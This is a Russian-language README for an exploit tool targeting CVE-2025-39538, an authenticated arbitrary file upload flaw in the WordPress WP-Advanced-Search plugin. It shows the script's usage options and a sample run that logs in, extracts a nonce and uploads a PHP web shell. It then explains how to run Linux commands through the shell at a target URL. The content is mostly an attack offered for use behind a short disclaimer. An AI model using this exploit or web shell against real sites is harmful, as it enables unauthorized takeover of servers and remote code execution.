
WordPress WP-Advanced-Search <= 3.3.9.3 - Уязвимость произвольной загрузки файлов
CVE-2025-39538
Опубликовано: 2025-04-16
Тип уязвимости: Произвольная загрузка файлов (неограниченная загрузка файла опасного типа)
Затронутый плагин: WP-Advanced-Search от Mathieu Chartier
Затронутые версии: Все версии до 3.3.9.3 включительно
Эта уязвимость позволяет аутентифицированному атакующему загрузить вредоносный PHP-файл (например, веб-шелл) на сервер, используя функцию импорта, предоставляемую плагином. Загруженный файл помещается в каталог загрузок WordPress и может привести к удаленному выполнению кода.
🧱 Путь загрузки:
wp-content/uploads/2025/04/
Этот скрипт на Python выполняет следующие действия:
wp_advanced_search_up_nonce со страницы администрирования импорта/экспорта.usage: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://127.0.0.1/wordpress)
-un, --username USERNAME
WordPress Username
-p, --password PASSWORD
WordPress Password
[*] Попытка входа...
[+] Вход выполнен успешно.
[*] Получение nonce со страницы импорта/экспорта...
[+] Nonce извлечен: 2140855687
[*] Попытка загрузить шелл...
[+] Файл загружен (проверьте wp-content/uploads или временный каталог).
После загрузки вы можете получить доступ к вашему шеллу следующим образом:
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
Замените whoami на любую команду Linux, которую хотите выполнить, например:
id — показывает идентификатор текущего пользователя.pwd — показывает текущий каталог.ls — выводит список файлов.Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом.
Автор: Nxploited | Khaled Alenazi